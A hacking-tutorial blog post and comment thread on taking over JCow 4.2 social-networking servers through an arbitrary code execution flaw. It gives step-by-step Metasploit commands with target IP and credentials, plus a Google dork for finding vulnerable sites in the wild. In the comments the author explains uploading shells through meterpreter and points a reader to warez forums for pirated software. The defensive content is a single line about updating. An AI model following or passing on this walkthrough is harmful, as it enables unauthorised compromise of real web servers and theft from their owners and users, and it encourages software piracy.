• 6,563
  • 91
  • +333
  • 225
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Bookmark

Type : Tutorial

Level : Medium

Victim Server : Windows XP SP3

Victim vulnerable application : JCow 4.2

Attacker O.S : Backtrack 5 R1

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".

So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also :-) ) you can own your web server directory.

In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim :-)

Okay I hope you understand what I say above :-P to make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework

2. Jcow.rb exploit

mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..

If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).

2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow

Information :

Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.

4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

PWNED! :-)

Countermeasures :

1. Update your Jcow Social Networking into > v4.2

Hope you enjoyed…any question?just drop it below.. :-)

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • http://yehg.net YEHG

    Nice tutorial!
    Thanks for featuring our exploit.
    http://www.exploit-db.com/exploits/17722/

    • http://www.vishnuvalentino.com v4L

      #yehg
      You’re welcome, btw thanks also for your exploit…next time when I write the tutorial, i’LL write a credit for the exploit maker :-)

  • Varius

    Cool. But how to upload some shell to the server? Didn't understand. Can help me, please?

    • http://www.vishnuvalentino.com v4L

      #Varius
      Actually when you’re inside a meterpreter you just need to run shell command to turn into shell. And about how to upload some shell, maybe what you mean was about meterpreter file system command.

  • Varius

    Thanks for you reply! I''l read that tutorial mindfully. I'm not a hacker, just using this script on my site, One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance

    • http://www.vishnuvalentino.com v4L

      #Varius
      You can use meterpreter upload command..

  • Pingback: Hacking Jcow Social Networking Webserver

  • Varius

    Thank u!

  • Varius

    Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, than this message occurs "Exploit completed, but no session was created."

    • http://www.vishnuvalentino.com v4L

      #Varius
      There’s many payload you can use…. use search meterpreter command or you also can use show payloads command.

  • Varius

    Thanks a lot! A very usefull info I found in this site! Y've helped me very much

    • http://www.vishnuvalentino.com v4L

      #Varius
      You’re welcome

  • http://hack-the-facebook.blogspot.com/ kyle91

     
     
    If someone is interested here can learn about facebook hacking, potecting 
    facebook account, facebook security, hacking tutorials for begginers and something about facebook games. 
    if you are not interested in this skip the comment and sorry for disturbing. 
    http://hack-the-facebook.blogspot.com/

  • Pingback: Hacking Jcow Social Networking Webserver « Belajar Bersama Ovhan

  • jjordan

    Dear Sir, I want your 1 help…please help me…I really in a problem…I want jcow professonal v7 plus [Full Version] free downloadable link….plz give me the link…Its my dream to start a social networking site..I am come from very poor family…plz help me plz….waiting for ur help….

    • http://www.vishnuvalentino.com v4L

      #jjordan
      You can search in a warez forum. They have much more resources for nulled scripts, web template and web engine…

  • http://www.cheaplvjp.com/ ルイヴィトンバッグ

    Hi there I am so grateful I found your web site, I really found
    you by accident, while I was researching on Bing for something else, Regardless I am here now and
    would just like to say thanks a lot for a marvelous post and a all round thrilling blog (I also love the theme/design), I don’t have time to go through it all at the minute but I
    have bookmarked it and also added in your RSS feeds, so when
    I have time I will be back to read a lot more, Please
    do keep up the great work.

  • http://www.totallynsfw.com/member/393392 Elena

    I seriously love your blog.. Excellent colors & theme.

    Did you make this website yourself? Please reply back as I’m trying to create my own personal blog and want to know where you got this from or exactly what the theme is named. Cheers!

  • http://s276214434.onlinehome.us/profile.php?ID=3460 seo copywriting

    Hello! Would you mind if I share your blog with my zynga group?
    There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks

    • http://www.vishnuvalentino.com v4L

      #seo
      Sure, as long as you put the link credit to this website without remove the copyright.